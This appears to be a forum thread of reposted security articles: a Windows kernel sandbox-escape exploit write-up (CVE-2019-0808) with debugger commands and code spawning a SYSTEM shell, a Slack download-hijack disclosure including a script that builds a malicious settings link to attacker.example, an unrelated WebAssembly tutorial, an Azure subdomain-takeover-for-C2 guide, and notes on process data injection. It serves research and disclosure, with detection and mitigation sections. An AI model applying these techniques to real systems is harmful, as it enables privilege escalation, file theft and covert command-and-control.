To better understand the importance of NULLing the job object, examine the following dump of the process object for a normal Chrome renderer process. Notice that the Job field is filled in, so the job object restrictions are currently being applied to the process.

    0: kd> !process C54
    Searching for Process with Cid == c54
    PROCESS 859b8b40  SessionId: 2  Cid: 0c54    Peb: 7ffd9000  ParentCid: 0f30
        DirBase: bf2f2cc0  ObjectTable: 8258f0d8  HandleCount: 213.
        Image: chrome.exe
        VadRoot 859b9e50 Vads 182 Clone 0 Private 2519. Modified 718. Locked 0.
        DeviceMap 9abe5608
        Token                             a6fccc58
        ElapsedTime                       00:00:18.588
        UserTime                          00:00:00.000
        KernelTime                        00:00:00.000
        QuotaPoolUsage[PagedPool]         351516
        QuotaPoolUsage[NonPagedPool]      11080
        Working Set Sizes (now,min,max)  (9035, 50, 345) (36140KB, 200KB, 1380KB)
        PeakWorkingSetSize                9730
        VirtualSize                       734 Mb
        PeakVirtualSize                   740 Mb
        PageFaultCount                    12759
        MemoryPriority                    BACKGROUND
        BasePriority                      8
        CommitCharge                      5378
        Job                               859b3ec8

            THREAD 859801e8  Cid 0c54.08e8  Teb: 7ffdf000 Win32Thread: fe118dc8 WAIT: (UserRequest) UserMode Non-Alertable
                859c6dc8  SynchronizationEvent

To confirm these restrictions are indeed in place, one can examine the process token for this process in Process Explorer, which confirms that the job contains a number of restrictions, such as prohibiting the spawning of child processes.

Job restrictions on the Chrome renderer process preventing spawning of child processes

If the Job field within this process object is set to NULL, WinDBG's !process command no longer associates a job with the process.
    1: kd> dt nt!_EPROCESS 859b8b40 Job
       +0x124 Job : 0x859b3ec8 _EJOB
    1: kd> dd 859b8b40+0x124
    859b8c64  859b3ec8 99c4d988 00fd0000 c512eacc
    859b8c74  00000000 00000000 00000070 00000f30
    859b8c84  00000000 00000000 00000000 9abe5608
    859b8c94  00000000 7ffaf000 00000000 00000000
    859b8ca4  00000000 a4e89000 6f726863 652e656d
    859b8cb4  00006578 01000000 859b3ee0 859b3ee0
    859b8cc4  00000000 85980450 85947298 00000000
    859b8cd4  862f2cc0 0000000e 265e67f7 00008000
    1: kd> ed 859b8c64 0
    1: kd> dd 859b8b40+0x124
    859b8c64  00000000 99c4d988 00fd0000 c512eacc
    859b8c74  00000000 00000000 00000070 00000f30
    859b8c84  00000000 00000000 00000000 9abe5608
    859b8c94  00000000 7ffaf000 00000000 00000000
    859b8ca4  00000000 a4e89000 6f726863 652e656d
    859b8cb4  00006578 01000000 859b3ee0 859b3ee0
    859b8cc4  00000000 85980450 85947298 00000000
    859b8cd4  862f2cc0 0000000e 265e67f7 00008000
    1: kd> dt nt!_EPROCESS 859b8b40 Job
       +0x124 Job : (null)
    1: kd> !process C54
    Searching for Process with Cid == c54
    PROCESS 859b8b40  SessionId: 2  Cid: 0c54    Peb: 7ffd9000  ParentCid: 0f30
        DirBase: bf2f2cc0  ObjectTable: 8258f0d8  HandleCount: 214.
        Image: chrome.exe
        VadRoot 859b9e50 Vads 180 Clone 0 Private 2531. Modified 720. Locked 0.
        DeviceMap 9abe5608
        Token                             a6fccc58
        ElapsedTime                       00:14:15.066
        UserTime                          00:00:00.015
        KernelTime                        00:00:00.000
        QuotaPoolUsage[PagedPool]         351132
        QuotaPoolUsage[NonPagedPool]      10960
        Working Set Sizes (now,min,max)  (9112, 50, 345) (36448KB, 200KB, 1380KB)
        PeakWorkingSetSize                9730
        VirtualSize                       733 Mb
        PeakVirtualSize                   740 Mb
        PageFaultCount                    12913
        MemoryPriority                    BACKGROUND
        BasePriority                      4
        CommitCharge                      5355

            THREAD 859801e8  Cid 0c54.08e8  Teb: 7ffdf000 Win32Thread: fe118dc8 WAIT: (UserRequest) UserMode Non-Alertable
                859c6dc8  SynchronizationEvent

Examining Process Explorer once again confirms that since the Job field in the Chrome renderer's _EPROCESS structure has been NULL'd out, there is no longer any job associated with the Chrome renderer process.
This can be seen in the following screenshot, which shows that the Job tab is no longer available for the Chrome renderer process since no job is associated with it anymore, which means it can now spawn any child process it wishes.

No job object is associated with the process after the Job pointer is set to NULL

Spawning the New Process

Once Shellcode() finishes executing, WindowHookProc() will check whether the variable success was set to TRUE, indicating that the exploit completed successfully. If it was, it will print out a success message before returning execution to main().

    if (success == TRUE) {
        printf("[*] Successfully exploited the program and triggered the shellcode!\r\n");
    }
    else {
        printf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n");
        ExitProcess(-1);
    }

main() will exit its window message handling loop since there are no more messages to be processed, and will then check whether success is set to TRUE. If it is, a call to WinExec() is performed to execute cmd.exe with SYSTEM privileges using the stolen SYSTEM token.

    // Execute command if exploit success.
    if (success == TRUE) {
        WinExec("cmd.exe", 1);
    }

Demo Video

The following video demonstrates how this vulnerability was combined with István Kurucsai's exploit for CVE-2019-5786 to form the fully working exploit chain described in Google's blog post. Notice that the attacker can spawn arbitrary commands as the SYSTEM user from Chrome despite the limitations of the Chrome sandbox.

Code for the full exploit chain can be found on GitHub: https://github.com/exodusintel/CVE-2019-0808

Detection

Detection of exploitation attempts can be performed by examining user mode applications to see if they make any calls to CreateWindow() or CreateWindowEx() with an lpClassName parameter of "#32768".
Any user mode applications which exhibit this behavior are likely malicious, since the class string "#32768" is reserved for system use, and should therefore be subject to further inspection.

Mitigation

Running Windows 8 or higher prevents attackers from being able to exploit this issue, since Windows 8 and later prevent applications from mapping the first 64 KB of memory (as mentioned on slide 33 of Matt Miller's 2012 BlackHat slide deck), which means that attackers can't allocate the NULL page or memory near the NULL page such as 0x30. Additionally, upgrading to Windows 8 or higher will also allow Chrome's sandbox to block all calls to win32k.sys, thereby preventing the attacker from being able to call NtUserMNDragOver() to trigger this vulnerability. On Windows 7, the only possible mitigation is to apply KB4489878 or KB4489885, which can be downloaded from the links in the CVE-2019-0808 advisory page.

Conclusion

Developing a Chrome sandbox escape requires a number of requirements to be met. However, by combining the right exploit with the limited mitigations of Windows 7, it was possible to make a working sandbox escape from a bug in win32k.sys to illustrate the 0Day exploit chain originally described in Google's blog post. The timely and detailed analysis of vulnerabilities is one of the benefits of an Exodus nDay Subscription. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organisations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets.

Sursa: https://blog.exodusintel.com/2019/05/17/windows-within-windows/
-
Stealing Downloads from Slack Users
David Wells, May 17

I'm going to go over an interesting feature abuse that could have been used to steal and even manipulate downloads from Slack users using the Slack desktop app on Windows. The vulnerability was reported to Slack via HackerOne based on our coordinated disclosure policy, and Slack has patched this issue in one of its latest updates, v3.4.0. The vulnerability could have allowed a remote attacker to submit a masqueraded link in a Slack channel that, if clicked by a victim, would silently change the download location setting of the Slack client to an attacker-owned SMB share. This could have caused all documents subsequently downloaded by the victim to be uploaded to an attacker-owned file server until the setting is manually changed back by the victim. While on the attacker's server, the attacker could have not only stolen the document, but even inserted malicious code in it, so that when it was opened by the victim after download (through the Slack application), their machine would have been infected. This entire technique relied on how Slack treated clickable links and what was possible with certain slack:// links. We will go over some interesting applications of this attack.

Changing Settings

Slack is an Electron app, which makes reverse engineering quite easy for us. As a Slack user, one feature that I was already familiar with was the support for "slack://" hyperlinks. I figured this may be an interesting attack vector, so with some grepping I found the area of code that processes these protocol links. Looking at the functions, we can see an interesting one in the protocol-link.ts module, which has the ability to change Slack app settings if clicked. We can find what available settings can be changed by looking in the Settings-Reducer.ts module, which contains all Slack settings. Nearly all of these settings are modifiable through slack://settings links.
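As an aside, the general shape of such a settings-update link is easy to sketch. The helper below is purely illustrative: the setting name comes from the post, the share path is a made-up example, and whether the client accepted strict JSON or single-quoted payloads is a client implementation detail.

```python
# Illustrative only: build a slack://settings update link of the kind
# described in this post. The SMB path below is a hypothetical example.
import json
from urllib.parse import quote

def build_settings_link(setting: str, value: str) -> str:
    # Slack filtered certain characters such as ':' out of these links,
    # which is why a rootless SMB share path was used in the research.
    payload = json.dumps({setting: value})
    return "slack://settings/?update=" + quote(payload)

link = build_settings_link("PrefSSBFileDownloadPath", r"\\attacker.example\share")
print(link)
```

Note that the JSON encoding and URL quoting here are assumptions for the sketch; the original research only shows the `slack://settings/?update={...}` shape of the link.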
Download Location Hijack

After researching all of the settings we can change, I found the most interesting setting reachable through a slack:// protocol handler was the "PrefSSBFileDownloadPath" setting. This changed the download destination path of a user. Crafting a link like "slack://settings/?update={'PrefSSBFileDownloadPath':'<pathHere>'}" would change the default download location if clicked (until manually changed back). The links, however, cannot contain certain characters, as Slack filters them out. One of these characters is the ":" (colon), which means we can't actually supply a path with a drive root. An SMB share, however, completely bypassed this sanitization, as there is no drive root needed. After setting up a remote SMB share, we could send users or channels a link that would redirect all downloads to it after they click the link. Once this is clicked, we can see that the change was successfully made in the advanced settings. If we now download a document, it is instead uploaded to this remote SMB share.

Attack Vectors

From a practical standpoint, the link text should be obscured, as it looks sketchy on its own and savvy users probably won't click it. There are a couple of options available for this.

Authenticated Channel Member

Researching Slack documentation, it didn't appear to be possible to hyperlink words in a channel at first. However, playing around with the Slack API (and later seeing documentation for it), I found you could accomplish text hyperlinking through the "attachments" feature. This can be accomplished by adding an "attachment" field to your Slack POST request with the appropriate fields. When this Slack message is submitted to a channel, it will now have hyperlinked "http://google.com" to my malicious slack:// link instead. When clicked, this will instantly change the victim's Slack download location.

Unauthenticated Channel Member

This applies if we aren't a member of a Slack channel.
This is quite interesting as you may wonder…”Can we get our malicious link to enter into Slack channels we aren’t even a part of?” YES! It’s possible! This can be accomplished through RSS feeds. Slack channels can subscribe to RSS feeds to populate a channel with site updates which can contain links. Lets consider an example with reddit.com, here I could make a post to a very popular Reddit community that Slack users around the world are subscribed to (in this test case however, I chose a private one I owned). I will drop an http link (because slack:// links are not allowed to be hyperlinked on Reddit) that will redirect to our malicious slack:// link and change settings when clicked. Once posted to this subreddit, our test Slack channel (that is subscribed to this subreddit feed), is now populated with the new article entry and previews the text which includes the link. There is a slight drawback to this technique however. When a victim clicked this link, the browser prompted a dialog such as the one seen below. The victim would have had to click “Yes,” which then instantly changes their Slack client’s download location. Final Thoughts This technique could be unmasked by savvy Slack users, however if decades of phishing campaigns have taught us anything, it’s that users click links, and when leveraged through an untrusted RSS feed, the impact can get much more interesting. Furthermore, we could have easily manipulated the download item when we control the share it’s uploaded to, meaning the Slack user that opens/executes the downloaded file will actually instead be interacting with our modified document/script/etc off the remote SMB share, the options from there on are endless. Slack investigated and found no indication that this vulnerability was ever utilized, nor reports that its users were impacted. David Wells Sursa: https://medium.com/tenable-techblog/stealing-downloads-from-slack-users-be6829a55f63
-
Raw WebAssembly

Can you use the DOM in WebAssembly? Rust says yes, other people say no. Before we can resolve that dissonance, I need to shine some light on what raw WebAssembly can do. When you go to WebAssembly.org, the very first thing you see is that it's a "stack-based virtual machine". It's absolutely not necessary to understand what that means, or even look at the WebAssembly VM specification, to make good use of WebAssembly. This is not required reading. However, it can be helpful to have a deeper understanding of this ominous VM to understand what is within the capabilities of a WebAssembly module and what certain errors mean.

Putting the "Assembly" in "WebAssembly"

While WebAssembly is famously "Neither Web, Nor Assembly", it does share some characteristics with other assembly languages. For example: the spec contains both a specification for the binary representation as well as a human-readable text representation. This text format is called "Wat" and is short for "WebAssembly text format". You can use Wat to hand-craft WebAssembly modules. To turn a Wasm module into Wat, or to turn a Wat file back into a Wasm binary, use wasm2wat or wat2wasm from the WebAssembly Binary Toolkit.

A small WebAssembly module

I am not going to explain all the details of the WebAssembly virtual machine, but will just go through a couple of short examples here that should help you understand how to read Wat. If you want to know more details, I recommend browsing MDN or even the spec. You can follow along on your own machine with the tools mentioned above, open the hosted version of the demos (linked under each example) or use WebAssembly.studio, which has support for Wat but also C, Rust and AssemblyScript.

(; Filename: add.wat
   This is a block comment.
;)
(module
  (func $add (param $p1 i32) (param $p2 i32) (result i32)
    local.get $p1 ;; Push parameter $p1 onto the stack
    local.get $p2 ;; Push parameter $p2 onto the stack
    i32.add       ;; Pop two values off the stack and push their sum
                  ;; The top of the stack is the return value
  )
  (export "add" (func $add))
)

The file starts with a module expression, which is a list of declarations of what the module contains. This can be a multitude of things, but in this case it's just the declaration of a function and an export statement. Everything that starts with $ is a named identifier and is turned into a unique number during compilation. These identifiers can be omitted (and the compiler will take care of the numbering), but the named identifiers make Wat code much easier to follow. After assembling our .wat file with wat2wasm, we can disassemble it again (for lols) with wasm2wat. The result is below.

(module
  (type (;0;) (func (param i32 i32) (result i32)))
  (func (;0;) (type 0) (param i32 i32) (result i32)
    local.get 0
    local.get 1
    i32.add
  )
  (export "add" (func 0))
)

As you can see, the named identifiers have disappeared and have been replaced with (somewhat) helpful comments by the disassembler. You can also see a type declaration that was generated for you by wat2wasm. It's technically always necessary to declare a function's type before declaring the function itself, but because the type is fully inferable from the declaration, wat2wasm injects the type declaration for us. Within this context, function type declarations will seem a bit redundant, but they will become more useful when we talk about function imports later.

Pro tip: Did you know that the "Source" panel in DevTools will automatically disassemble .wasm files for you?

A function declaration consists of a couple of items, starting with the func keyword, followed by the (optional) identifier. We also need to specify a list of parameters with their types, the return type and an optional list of local variables.
The function body is itself a list of instructions for the VM's stack. Using these instructions you can push values onto the stack, pop values off the stack and replace them with the result of an operation, or load and store values in local variables, global variables or even memory (more about that later). A function must leave exactly one value on the stack as the function's return value. Writing code for a stack-based machine can sometimes feel a bit weird. Wat also offers "folded" instructions, which look a bit like functional programming. The following two function declarations are equivalent:

(func $add (param $p1 i32) (param $p2 i32) (result i32)
  local.get $p1
  local.get $p2
  i32.add
)

(func $add (param $p1 i32) (param $p2 i32) (result i32)
  (i32.add (local.get $p1) (local.get $p2))
)

The export declaration can assign a name to an item from the module declaration and make it available externally. In our example above we exported the $add function with the name add.

Loading a raw WebAssembly module

If we compile our add.wat file to an add.wasm file and load it in the browser (or in Node, if you fancy), you should see an add() function on the exports property of your module instance.

<script>
  async function run() {
    const {instance} = await WebAssembly.instantiateStreaming(
      fetch("./add.wasm")
    );
    const r = instance.exports.add(1, 2);
    console.log(r);
  }
  run();
</script>

Live demo

The compilation of a WebAssembly module can start even while the module is still downloading. The bigger the Wasm module, the more important it is to parallelize downloading and compilation using instantiateStreaming. There are two pitfalls with this function, though: Firstly, it will throw if you don't have the right Content-Type header, so make sure you set it to application/wasm for all .wasm files.
Secondly, Safari doesn’t support instantiateStreaming at all yet, so I tend to use this drop-in replacement: <script> async function maybeInstantiateStreaming(path, ...opts) { // Start the download asap. const f = fetch(path); try { // This will throw either if `instantiateStreaming` is // undefined or the `Content-Type` header is wrong. return WebAssembly.instantiateStreaming( f, ...opts ); } catch(_e) { // If it fails for any reason, fall back to downloading // the entire module as an ArrayBuffer. return WebAssembly.instantiate( await f.then(f => f.arrayBuffer()), ...opts ); } } </script> This is similar to what Emscripten does and has worked well in the past. Functions A WebAssembly module can have multiple functions, but not all of them need to be exported: ;; Filename: contrived.wat (module (func $add (; …same as before… ;)) (func $add2 (param $p1 i32) (result i32) local.get $p1 i32.const 2 ;; Push the constant 2 onto the stack call $add ;; Call our old function ) (func $add3 (param $p1 i32) (result i32) local.get $p1 i32.const 3 ;; Push the constant 3 onto the stack call $add ;; Call our old function ) (export "add2" (func $add2)) (export "add3" (func $add3)) ) Live demo Notice how add2 and add3 are exported, but add is not. As such add() will not be callable from JavaScript. It’s only used in the bodies of our other functions. WebAssembly modules can not only export functions but also expect a function to be passed to the WebAssembly module at instantiation time by specifying an import: ;; Filename: funcimport.wat (module ;; A function with no parameters and no return value. (type $log (func (param) (result))) ;; Expect a function called `log` on the `funcs` module (import "funcs" "log" (func $log)) ;; Our function with no parameters and no return value. (func $doLog (param) (result) call $log ;; Call the imported function ) (export "doLog" (func $doLog)) ) If we load this module with our previous loader code, it will error. 
It is expecting a function in its imports object and we have provided none. Let's fix that:

<script>
  async function run() {
    function log() {
      console.log("This is the log() function");
    }
    const {instance} = await WebAssembly.instantiateStreaming(
      fetch("./funcimport.wasm"),
      {funcs: {log}}
    );
    instance.exports.doLog();
  }
  run();
</script>

Live demo

Running this will cause a log to appear in the console. We just called a WebAssembly function from JavaScript, and then we called a JavaScript function from WebAssembly. Of course both these function calls could have passed some parameters and have return values. But when doing that, it's important to keep in mind that JavaScript only has IEEE 754 64-bit floats ("doubles"). Some types, like 64-bit integers, cannot be passed to JavaScript without loss in precision. Importing functions from JavaScript is a big puzzle piece in how Rust makes DOM operations possible from within Rust code with wasm-bindgen. This is of course glossing over some important and clever details, and I'll talk about those in a different blog post.

Memory

There's only so much you can do when all you have is a stack. After all, the very definition of a stack is that you can only ever reach the value that is on top. So most WebAssembly modules export a chunk of linear memory to work on. It's worth noting that you can also import a memory from the host environment instead of exporting it yourself. Whatever you prefer, you can only have exactly one memory unit overall (at the time of writing). This example is a bit contrived, so bear with me. The function add2() loads the first integer from memory, adds 2 to it and stores the result in the next position in memory.

;; Filename: memory.wat
(module
  ;; Create memory with a size of 1 page (= 64KiB)
  ;; that is growable to up to 100 pages.
  (memory $mem 1 100)
  ;; Export that memory
  (export "memory" (memory $mem))
  ;; Our function with no parameters and no return value,
  ;; but with a local variable for temporary storage.
  (func $add2 (param) (result)
    (local $tmp i32)
    ;; Load an i32 from address 0 and put it on the stack
    i32.const 0
    i32.load
    ;; Put the constant 2 on the stack and add the values
    i32.const 2
    i32.add
    ;; Temporarily store the result in the local
    local.set $tmp
    ;; Store that value at address 4
    i32.const 4
    local.get $tmp
    i32.store
  )
  (export "add2" (func $add2))
)

Note: We could avoid the temporary store in $tmp by moving the i32.const 4 to the very start of the function. Many people will see that as a simplification, and most compilers will actually do that for you. But for educational purposes I chose the more imperative but longer version. WebAssembly.Memory is just a sequence of bits for storage. You have to decide how to read or write to it. That's why there is a separate incarnation of store and load for each WebAssembly type. In the above example we are loading signed 32-bit integers, so we are using i32.load and i32.store. This is similar to how ArrayBuffers are just a series of bits that you need to interpret by using Float32Array, Int8Array and friends. To inspect the memory from JavaScript, we need to grab memory from our exports object. From that point on, it behaves like any ArrayBuffer.

<script>
  async function run() {
    const {instance} = await WebAssembly.instantiateStreaming(
      fetch("./memory.wasm")
    );
    const mem = new Int32Array(instance.exports.memory.buffer);
    mem[0] = 40;
    instance.exports.add2();
    console.log(mem[0], mem[1]);
  }
  run();
</script>

Live demo

Strings? Objects?

WebAssembly can only work with numbers as parameters. It can also only return numbers. At some point you will have functions where you'd want to accept strings or maybe even JSON-like objects. What do you do? Ultimately it comes down to an agreement on how to encode these more complex data types into numbers. I'll talk more about this when we transition to more high-level programming languages.
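The memory semantics above can be made concrete outside the browser too. The following Python sketch (an illustration added here, not part of the original article) mimics what the $add2 function does: it treats linear memory as raw bytes and interprets four of them at a time as a little-endian signed 32-bit integer, the way Int32Array does on the JavaScript side, while a plain list plays the role of the VM's value stack.

```python
# Python illustration of the memory example above: WebAssembly linear memory
# is just bytes; i32.load / i32.store interpret 4 of them as a little-endian
# signed 32-bit integer. This mirrors the wasm $add2 function step by step.
import struct

PAGE_SIZE = 64 * 1024
memory = bytearray(PAGE_SIZE)  # one wasm page

def i32_load(addr: int) -> int:
    return struct.unpack_from("<i", memory, addr)[0]

def i32_store(addr: int, value: int) -> None:
    struct.pack_into("<i", memory, addr, value)

def add2() -> None:
    stack = []                           # the VM's value stack
    stack.append(0)                      # i32.const 0
    stack.append(i32_load(stack.pop()))  # i32.load
    stack.append(2)                      # i32.const 2
    b, a = stack.pop(), stack.pop()
    stack.append(a + b)                  # i32.add
    tmp = stack.pop()                    # local.set $tmp
    stack.append(4)                      # i32.const 4
    stack.append(tmp)                    # local.get $tmp
    v, addr = stack.pop(), stack.pop()
    i32_store(addr, v)                   # i32.store

i32_store(0, 40)  # like mem[0] = 40 on the JS side
add2()
print(i32_load(0), i32_load(4))  # 40 42
```

Reading back addresses 0 and 4 after the call shows the same 40 and 42 the JavaScript demo logs.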
What I left out

There are a couple of things that WebAssembly modules can do that I didn't talk about:

Memory initialization: Memory can be initialized with data in the WebAssembly file. Take a look at datastring in the memory initializers and data segments.
Tables: Tables are mostly useful to implement concepts like function pointers and consequently patterns like dynamic dispatch or dynamic linking.
Globals: Yes, you can have global variables.
Many, many other operations on stack values (the numeric instructions).
And probably other stuff.

AssemblyScript

Writing Wat by hand can feel a bit awkward and is probably not the most productive way to create WebAssembly modules. AssemblyScript is a language with TypeScript's syntax that compiles to WebAssembly and closely mimics the capabilities of the WebAssembly VM. The functions that are provided by the standard library often map straight to WebAssembly VM instructions. I highly recommend taking a look!
-
Azure Apps for Command and Control

Azure Apps are often subject to subdomain takeovers, or you might even want to use Azure Apps for command and control!

Why Azure Apps?

Azure applications are often used by organisations to host websites. We can see many significant sites using them; the market share is quite large. We often hear of and see Azure Apps appearing in bug bounties via the likes of subdomain takeover vulnerabilities, see:

Starbucks disclosed on HackerOne: Subdomain takeover on one of Starbucks's subdomains. The subdomain pointed to a Microsoft Azure Cloud App which was no longer registered under Azure. Detailed write-up: https://0xpatrik.com/subdomain-takeover-starbucks/ (hackerone.com)

Azure bug bounty - Pwning Red Hat Enterprise Linux: Acquired administrator level access to all of the Microsoft Azure managed Red Hat Update Infrastructure that supplies all the packages for all Red Hat Enterprise Linux instances booted from the Azure marketplace. (ianduffy.ie)

What are we doing here?

Although you might be thinking, "I can't take over people's domains and use it as command and control or for phishing in our engagements!" - sure, but it could very well be possible that your customer's subdomains are vulnerable; it's always worth checking. To exploit and use a subdomain takeover, you previously would have had to write custom code and deploy it on Azure Apps each time, so instead I just wrote a Python script to proxy all the traffic to my selected host over HTTPS. This way, we can re-use this code as many times as we want, for dynamic content feeding through Azure Apps.

Subdomain Takeover via Azure App

Overview

A subdomain takeover state via
Azure App is when a customer of Azure uses Azure Apps, configures their domain to point to the Azure App, has some fun with it, and then one day decides that they don't want to use it anymore, so they kill off the Azure App - but they don't delete the record pointing to Azure. You might be wondering why this happens. There are many reasons, and we're not here to discuss them all, but the basic ones I hear of are:

The cloud infrastructure deployment team is not the same team as the DNS management team, hence things get lost in communication pipelines somewhere.
The person does not know that the DNS record still pointing to Azure would be an issue. "Why does it matter if someone's hosting stuff on our subdomain? They aren't hacking us."

Whatever the reason may be, you can be sure that these vulnerabilities often crop up on assessments and can be used to hide under the radar of the blue team. Let's be clear; I've found the following types of organisations to be vulnerable:

Airline subdomains
Big Four / Large consultancy subdomains
Energy company subdomains
Global and local bank subdomains
Global retailer subdomains
Government subdomains
Insurance subdomains
Microsoft subdomains
Phone manufacturer subdomains
Telecom subdomains
Transport subdomains

So yeah, it's not exactly a small issue. For the unethical, it's a big surface. For the professionals doing attack simulation engagements, we still have a good chance our customer might have an associated domain's subdomain that might be vulnerable.

How does it work?

On this occasion, I've deliberately taken my domain of megacorp.icu and set a vulnerable subdomain pointing to Azure Apps. Specifically: myvulnerableapp.azurewebsites.net.
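The "Python script to proxy all the traffic" mentioned earlier is not reproduced in this excerpt, but the core idea can be sketched with nothing beyond the standard library. The code below is a hypothetical illustration of that design, not the author's actual script; C2_HOST is a placeholder for whatever backend you control.

```python
# Hypothetical sketch: an HTTP handler that forwards every request path to a
# chosen upstream host over HTTPS and relays the response back, so the Azure
# App serves dynamic content fetched from your own server.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urljoin
import urllib.request

C2_HOST = "https://c2.example.com"  # placeholder upstream, not a real server

def upstream_url(path: str) -> str:
    # Map an incoming request path onto the upstream host.
    return urljoin(C2_HOST + "/", path.lstrip("/"))

class ProxyHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        with urllib.request.urlopen(upstream_url(self.path)) as resp:
            body = resp.read()
            self.send_response(resp.status)
            self.send_header("Content-Type",
                             resp.headers.get("Content-Type", "text/html"))
            self.end_headers()
            self.wfile.write(body)

# To serve: HTTPServer(("0.0.0.0", 8000), ProxyHandler).serve_forever()
```

Deployed on the Azure App, any request to the taken-over subdomain would be answered with content fetched from the attacker-controlled host.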
Azure websites are not the only Azure App domain extension; the ones I generally look out for (when it comes to Azure Apps specifically) are:

*.cloudapp.net
*.cloudapp.azure.com
*.azurewebsites.net

Take a look at the following vulnerable DNS record: You can see that there's a missing slot, and no A record for the final IP to connect to. This is because myvulnerableapp is not registered in Azure Apps.

Let's exploit it

To exploit this, log in to the Azure console and create a new Azure App: Make sure that you create an F1 instance, in my opinion, unless of course you're mega rich and don't mind paying by the hour for the premium instance (which I did, and ended up being billed US$200 before I even knew what happened). After the instance is ready, I like to start with a template:

git clone https://github.com/Azure-Samples/python-docs-hello-world

Then cd into it, and edit the application.py file (with the code from my GitHub): Add urllib2 to the requirements.txt file: Save the file. To skip the previous steps of picking F1 and using the GUI, you can create the whole app and deploy from the CLI: Test that the page works by visiting the URL: Once it's working, you can go to the Azure portal and configure the custom domains as shown below: Once you've added the record, you can do a DNS lookup again, and you will see that it's now completely changed. See the following screenshot: Visit the domain we took over, hansolo.megacorp.icu, and you can see our content from our C2 server: If you want to use HTTPS, you will need to upload your SSL certificate to the Azure portal and bind the SSL certificate to it.

Video

For those that prefer a video to learn from, here you go!

Git the goods

https://github.com/vysecurity/AzureAppC2

Sursa: https://vincentyiu.co.uk/red-team/attack-infrastructure/azure-apps-for-command-and-control
-
Inserting data into other processes’ address space May 18, 2019 in Anti-*, Anti-Forensics, Code Injection, Compromise Detection, EDR, Random ideas Code Injection almost always requires some sort of direct inter-process communication to inject the payload. Typically, the injecting process will first plant the shellcode inside other process’ address space, and then will attempt to trigger the execution of that code via remote thread, APC, patching (e.g. of NtClose function), or one of many recently described code execution tricks, etc.. There are obviously other more friendly alternatives, but mainly focused on loading a DLL in a forced/manipulated way (e.g. using LOLBIN techniques, phantom DLL loading, side-loading /OS bugs, plugX etc./, API trickery, etc.). Over last few months I had discussions with many malware analysts and vulnerability researchers about various code/data injection tricks… This post is trying to give a very high level summary of available data injection tricks. Yes, the WriteProcessMemory and NtWriteVirtualMemory are not enough anymore (obviously!) but they are not the only option either… Note here that actual code execution is a different story and not always possible. And actually, it is most of the time not even possible, but in this post we don’t care. This post is focusing primarily on ‘what-if’ scenarios… not all of them have to be successful. Okay, for the lack of a better incentive… just think of injecting EICAR string into other processes just to see how the existing/running AV / EDR will react. Curious? I sure am ! And if you need an immediate example – look at this post. We can instrument csrss.exe to receive any data we want by triggering the hard error with… a message a.k.a. data we fully control. We don’t even need to craft a dedicated file – we could simply call the NtRaiseHardError API with appropriate arguments… Anyways… let’s come back to the data injection. 
When we start thinking of possible injection avenues, they are all over the place… Well… many articles were written about interprocess communication (IPC), and this is the first place where we can look at what's available. As per the MS article, the most popular IPC mechanisms are:

Clipboard
COM
Data Copy
DDE
File Mapping
Mailslots
Pipes
RPC
Windows Sockets

But there is more… For example, if you spawn a child process, you can pass data to it via the command line argument or via the environment block – this is because you can control these buffers 100% – you are the (bad) parent process after all! The command-line-as-a-code-inject trick is something I saw many years ago (at least 12!) so it's definitely not my original idea. For the second technique I am not sure there is any PoC, but for it to succeed, the environment block requires the data/code to be in a textual form with a series of string=value pairs. Yes, actual environment variables and their values, or lookalikes. As with everything, there is already an existing body of knowledge to address that last bit, e.g. English Shellcode (PDF warning) from Johns Hopkins University. For GUI applications, there are window messages and their wrappers (e.g. SetWindowText, but also specific control messages, e.g. WM_SETTEXT) and common control-specific messages (not covered here in detail); there are also window properties (SetProp), specific commands to add/remove items from menus, etc. Then there is the good old clipboard, Accessibility functions, the WM_COPYDATA message, and many interfaces allowing remote programs to access some of the application data – often using some legacy method (e.g. IWebBrowser2, DDE). We can also play with resources and modify them, where applicable; e.g. with MUI file poisoning, nothing stops us from injecting extra data into signed processes using resources tweaked to our needs!
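To make the command-line/environment-block point concrete, here is a small, benign, cross-platform illustration in Python (the variable name and payload text are invented for the example): the parent fully controls the child's environment block, so arbitrary text-form data ends up inside the child's address space without any classic WriteProcessMemory-style call.

```python
# Benign illustration: plant parent-controlled text in a child process's
# environment block. The data lives inside the child's address space as an
# ordinary string=value pair, exactly as described above.
import os
import subprocess
import sys

PAYLOAD = "THIS-COULD-BE-ANY-TEXT-FORM-DATA-EVEN-ENGLISH-SHELLCODE"

env = dict(os.environ, HARMLESS_LOOKING_VAR=PAYLOAD)
child = subprocess.run(
    [sys.executable, "-c",
     "import os; print(os.environ['HARMLESS_LOOKING_VAR'])"],
    env=env, capture_output=True, text=True,
)
print(child.stdout.strip())
```

The child simply echoes the variable here, but the point is that the bytes are resident in its memory from process start, whether or not the child ever touches them.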
In some cases Registry entries or configuration files (.ini, but also proprietary files) could work too – especially those that are always used by the target application and accessed/refreshed often (e.g. wincmd.ini for Total Commander). Any time the program loads these settings/Registry values, they will be loaded somewhere into program memory (the data doesn't even need to be correct all the time, as long as it is being read by the target application and is stored in memory, even if temporarily). Small shellcodes could replace Registry settings, in particular strings, paths and data 'guaranteed' to be available immediately, or almost immediately (f.ex. the MRU list), etc. Depending on how the target application stores/uses that data (locally, on the stack, or globally in some non-volatile memory area), it could remain persistent for a while. And in some cases, e.g. with text editors or spreadsheets, files could be loaded any time the application is re-launched. Data/code could be stored in templates, highlighting files, scripts, etc. It's very vague, of course, but it's not hard to find locations that could be interesting, e.g. for Regedit you could use its bookmarking area (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\Regedit\Favorites) to inject some data into that process. For UltraEdit you could look at highlighting files, wincmd.ini is a great target for Total Commander, etc. Registry settings are very interesting in general. What if e.g. we created a fake font, installed it on a targeted system and then made sure that it is loaded as a default for cmd.exe or powershell.exe terminal windows? The font could be a copy of one of the standard fonts, but additionally include some extra data?
